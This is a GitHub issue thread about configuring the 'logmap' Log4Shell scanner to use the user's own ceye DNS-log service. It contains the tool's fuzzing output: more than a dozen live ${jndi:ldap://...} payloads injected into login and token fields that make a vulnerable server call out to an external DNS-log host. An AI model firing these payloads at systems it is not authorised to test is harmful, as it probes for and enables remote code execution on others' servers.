### ISSUE TITLE
Payloads

### ISSUE THREAD

**Issue by Teicu** [zhzyker/logmap#2]
Hi 

why is the scanner still using your dnslog address? I modified as you explained logmap.py with my ceye address but seems useless. What is the problem?

[*] Fuzz body: payload=${jndi:ldap://706447ea343c33579615468af10ba6e8d52.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: user=${jndi:ldap://583e1c291b13423802c6f5a6317b9aa503.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: pass=${jndi:ldap://ce3cb7fa12349b10c7f04184664f2e4d30.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: username=${jndi:ldap://8ba8434e6e6a7a9c439ee295813d4274f1.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: password=${jndi:ldap://a34b6342a8f9f904ef123d4acd41ef84fb.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: login=${jndi:ldap://19a6f69d3431007656895d5b9a5cea1a88c.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: email=${jndi:ldap://1496093343816930cac1eae4872b36d28b3.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: principal=${jndi:ldap://59c7343e3427d4c5c780c77d3af8b40a046.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: token=${jndi:ldap://b779933434f686fe0a858454db4c9876cb45.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: verify=${jndi:ldap://1e95d93432a63eaf88a42d4de219d00b1a7.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: dest=${jndi:ldap://0b4db253437ca23d7eeb792f34a95bad937.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: login_password=${jndi:ldap://80f221856555e7f9d7502f4cd89f42838c6.649a1815.dns.1433.eu.org.:443/dvYBvm}
[*] Fuzz body: login_username=${jndi:ldap://533019256e8c9ea5ffa5015893e5d04bb4.649a1815.dns.1433.eu.org.:443/dvYBvm}

**Comment by zhzyker** [comment]
![image](https://user-images.githubusercontent.com/32918050/150455647-e25d796b-8608-4926-a9cb-453f51ae7e07.png)

If you want to use ceye, you need to specify it with `-d/--dns 2`
@Teicu

**Comment by Teicu** [comment]
Thank you very much! works fine now
